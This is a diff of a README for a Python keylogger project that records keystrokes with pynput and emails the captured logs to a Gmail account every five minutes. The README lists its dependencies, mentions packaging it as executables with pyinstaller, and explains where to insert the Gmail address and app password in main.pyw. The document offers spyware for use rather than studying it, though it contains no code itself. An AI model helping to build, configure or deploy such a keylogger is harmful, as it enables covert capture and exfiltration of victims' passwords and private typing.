BPPL0806/PythonGmailKeylogger/README.md

 <img align="right" src="imgs/klggr.png">

 ### Keylogger written in Python 3.11 that sends logs to gmail account via smtplib.
-By default keylogger sends all logs every 10 minutes.
+By default keylogger sends all logs every 5 minutes.
 If nothing is captured after the last email, nothing will be sent as long as the program will detect another key being pressed.

 #### pip requirements:
-- keyboard from pynput
+- pynput
-- MIMEText from email.mime.text
+- email.mime.text
-- gethostbyname & gethostname from socket
+- socket
-- system from platform
+- platform
+- requests
 - time
 - smtplib
-- pyinstaller (building exe)
+- pyinstaller (building executables)

 # Instructions <img align="right" src="imgs/manual.png">

 ### 1. Using gmail address and app password in keylogger.
-You need generated gmail app password, just put it inside code of ```main.pyw``` with gmail address into function in line 63.
+You need generated gmail app password, just put it inside code of ```main.pyw``` with email address and app password (at lines 72-74).

 ![Image of function](imgs/func.png)